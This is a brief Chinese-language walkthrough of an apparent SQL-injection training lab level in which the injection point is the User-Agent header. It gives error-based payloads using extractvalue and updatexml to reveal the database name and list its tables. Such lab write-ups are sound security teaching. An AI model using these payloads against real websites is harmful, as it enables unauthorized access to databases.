页面提示user agent
通过注入点测试填写正确的账户密码可以获得浏览器标识符,所以应该是通过浏览器标识符进行注入,为确认一下猜测是否正确,查看一下源码
猜测正确
注入点在 uagent处,确定注入点后,输入SQL语句
查看数据库
'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '
或
',1,updatexml(1,concat(0x7e,(select database()),0x7e),1)) -- -
接下来就正常的注入了
admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))and'--+
可以参考前面的单引号注入,比如第十一关,我就先溜了。